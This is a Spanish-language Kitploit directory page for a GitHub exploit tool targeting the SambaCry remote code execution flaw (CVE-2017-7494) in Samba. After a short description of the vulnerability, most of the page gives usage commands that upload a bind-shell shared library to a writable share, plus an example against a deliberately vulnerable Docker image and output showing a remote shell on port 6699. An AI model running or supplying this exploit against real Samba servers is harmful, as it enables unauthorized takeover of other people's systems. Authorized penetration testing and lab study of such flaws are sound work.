Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-CVE-2017-7494 — Exploit de SambaCry (CVE-2017-7494) | Kitploit
Herramientas/GitHubGitHub/00mjk/exploit-cve-2017-7494
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub00mjk/exploit-cve-2017-7494

exploit-CVE-2017-7494

Exploit de SambaCry (CVE-2017-7494)

Ver Repositorio
12hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit SambaCry RCE para Samba 4.5.9

Samba es una reimplementación de software libre del protocolo de red SMB/CIFS. Samba proporciona servicios de archivos e impresión para diversos clientes de Microsoft Windows y puede integrarse con un dominio de Microsoft Windows Server, ya sea como Controlador de Dominio (DC) o como miembro del dominio. A partir de la versión 4, es compatible con Active Directory y dominios de Microsoft Windows NT.

Samba en la versión 4.5.9 y anteriores es vulnerable a una vulnerabilidad de ejecución remota de código llamada SambaCry. CVE-2017-7494 permite a usuarios autenticados remotos subir una biblioteca compartida a una carpeta compartida con permiso de escritura y realizar ataques de ejecución de código para tomar el control de servidores que ejecutan servicios Samba vulnerables.

Samba 3.x posterior a 3.5.0 y 4.x anterior a 4.4.14, 4.5.x anterior a 4.5.10 y 4.6.x anterior a 4.6.4 no restringe la ruta de archivo al usar named pipes de Windows, lo que permite a usuarios autenticados remotos subir una biblioteca compartida a una carpeta compartida con permiso de escritura y ejecutar código arbitrario mediante un named pipe manipulado.

Exploit

Usa poetry para configurar el entorno para este exploit

root@kitploit:~
pip3 install -r requirements.txt

Después puedes ejecutarlo de la siguiente manera:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s <share> -r <location>/libbindshell-samba.so \
             -u <user> -p <password> -P 6699

Por ejemplo, si usas la imagen vulnerable de vulnerables/cve-2017-7494 y quieres ejecutar este exploit contra ella:

Descargar herramienta
root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699

Y obtendrás la siguiente salida:

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>

Créditos

La carga útil de este proyecto, junto con el código, se inspiró en gran medida en opsxcq/exploit-CVE-2017-7494.